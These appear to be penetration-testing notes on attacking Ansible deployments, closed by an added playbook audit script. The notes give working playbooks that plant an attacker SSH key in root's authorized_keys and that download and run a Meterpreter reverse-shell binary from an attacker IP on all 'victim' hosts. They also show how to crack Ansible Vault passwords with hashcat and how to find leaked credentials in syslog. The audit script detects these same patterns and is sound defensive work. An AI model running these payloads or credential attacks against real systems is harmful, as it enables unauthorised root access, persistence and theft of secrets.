Ansible
Enumerating Ansible
Is Ansible in use? (Server)
ansible
ls /etc/ansible
grep ansible /etc/passwd
Identify Ansible nodes (Client)
grep ansible /etc/passwd
Attack Vectors
Initiated from server
ad-hoc commands
playbooks
Running ansible commands
su ansibleadm
ansible victims -a "whoami"
To run as root add --become; the name victims is an inventory group from the /etc/ansible/hosts file, so adjust it as needed
ansible victims -a "whoami" --become
ansible appservers -a "whoami"
Ansible Playbooks
Running playbooks
ansible-playbook [playbookname.yml]
Exploiting Playbooks
If root: run playbooks as the ansible user
If not root: search for hardcoded creds in playbooks (e.g. ansible_become_pass)
and grep /var/log/syslog for pass
Adding tasks if writable
- name: Get system info
  hosts: all
  gather_facts: true
  become: yes
  tasks:
    - name: Display info
      debug:
        msg: "The hostname is {{ ansible_hostname }} and the OS is {{ ansible_distribution }}"
    - name: Create a directory if it does not exist
      file:
        path: /root/.ssh
        state: directory
        mode: '0700'
        owner: root
        group: root
    - name: Create authorized keys if it does not exist
      file:
        path: /root/.ssh/authorized_keys
        state: touch
        mode: '0600'
        owner: root
        group: root
    - name: Update keys
      lineinfile:
        path: /root/.ssh/authorized_keys
        line: "ssh-rsa AAAAB3NzaC1...Z86SOm..."
        insertbefore: EOF
Reverse Meterpreter
- name: Meterpreter reverse tcp
  hosts: linuxvictim
  gather_facts: true
  become: yes
  become_user: root
  tasks:
    # async/poll 0 fires each step without waiting for it to return
    - name: Run command
      shell: "mkdir /tmp/shell"
      async: 10
      poll: 0
    - name: Run command
      shell: "wget http://192.168.X.Y/final.out -P /tmp/shell/"
      async: 10
      poll: 0
    - name: Run command
      shell: "chmod +x /tmp/shell/final.out"
      async: 10
      poll: 0
    - name: Run command
      shell: "/tmp/shell/final.out &"
      async: 10
      poll: 0
or
- name: Meterpreter reverse tcp
  hosts: linuxvictim
  gather_facts: true
  become: yes
  become_user: root
  tasks:
    - name: Run command
      shell: "mkdir /tmp/shell && wget http://192.168.X.Y/final.out -P /tmp/shell/ && chmod +x /tmp/shell/final.out && /tmp/shell/final.out &"
      async: 10
      poll: 0
Ansible Vault
Copy encrypted password
use ansible2john.py
it returns a hash string for hashcat to use
python3 /usr/share/john/ansible2john.py ./test.yml > ans2johnhash.txt
copy string into testhash.txt
then run hashcat
hashcat testhash.txt --force --hash-type=16900 /usr/share/wordlists/rockyou.txt
copy original vault string to text file and use ansible-vault decrypt with the discovered password
cat pw.txt | ansible-vault decrypt
Ansible Data Leakage
leaks to /var/log/syslog
Cleartext in playbooks
unless no_log is set in the playbook
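Added audit script (not from the original notes) that checks a playbook for the weaknesses described above: plaintext ansible_become_pass style credentials, shell tasks that fetch a remote binary, tasks that edit root's authorized_keys, and password variables used without no_log. It is line-based so it needs no YAML library; the SAMPLE playbook and its IP are constructed placeholders.

```python
import re
# Constructed sample (not from the page); the IP is a placeholder. It mixes a plaintext
# become password, a vaulted one, a remote-fetch shell task and a root authorized_keys edit.
SAMPLE = """\
- name: Deploy app
  hosts: appservers
  vars:
    ansible_become_pass: Summer2024!
    ansible_password: !vault |
      <placeholder ciphertext>
  tasks:
    - name: Fetch and run a remote binary
      shell: "wget http://192.168.X.Y/final.out -P /tmp/shell/ && /tmp/shell/final.out &"
    - name: Register service account
      shell: "useradd -p {{ svc_pass }} svc"
    - name: Update keys
      lineinfile:
        path: /root/.ssh/authorized_keys
"""
CRED_RE = re.compile(r"^\s*(?P<key>ansible_(become_pass|become_password|password|ssh_pass))\s*:\s*(?P<val>.*)$")
SHELL_RE = re.compile(r"^\s*-?\s*(shell|command|raw)\s*:\s*(?P<cmd>.+)$")
FETCH_RE = re.compile(r"\b(wget|curl)\b.*https?://")
AUTHKEYS_RE = re.compile(r"/root/\.ssh/authorized_keys")
PASS_VAR_RE = re.compile(r"\{\{[^}]*pass[^}]*\}\}", re.IGNORECASE)
NOLOG_RE = re.compile(r"^\s*no_log\s*:\s*(true|yes)\s*$", re.IGNORECASE)

def audit_playbook(text):
    """Return (line, finding) pairs. Each '- name:' starts a block (play header or task)."""
    lines = text.splitlines()
    block, ids = 0, []
    for line in lines:
        block += bool(re.match(r"^\s*- name:", line))
        ids.append(block)
    no_log_blocks = {b for b, l in zip(ids, lines) if NOLOG_RE.match(l)}
    findings = []
    for n, (b, line) in enumerate(zip(ids, lines), 1):
        m = CRED_RE.match(line)
        if m:
            val = m.group("val").strip().strip("\"'")
            if not val.startswith(("!vault", "{{")):  # vaulted or templated values are fine
                findings.append((n, f"plaintext credential {m.group('key')}"))
            continue
        m = SHELL_RE.match(line)
        if m and FETCH_RE.search(m.group("cmd")):
            findings.append((n, "shell task fetches from a remote URL"))
        if AUTHKEYS_RE.search(line):
            findings.append((n, "task edits root's authorized_keys"))
        if PASS_VAR_RE.search(line) and b not in no_log_blocks:
            findings.append((n, "password variable used without no_log"))
    return findings
```

Run it over the playbooks in /etc/ansible and over anything writable by the ansible user; a finding on a writable playbook is the task-injection case above.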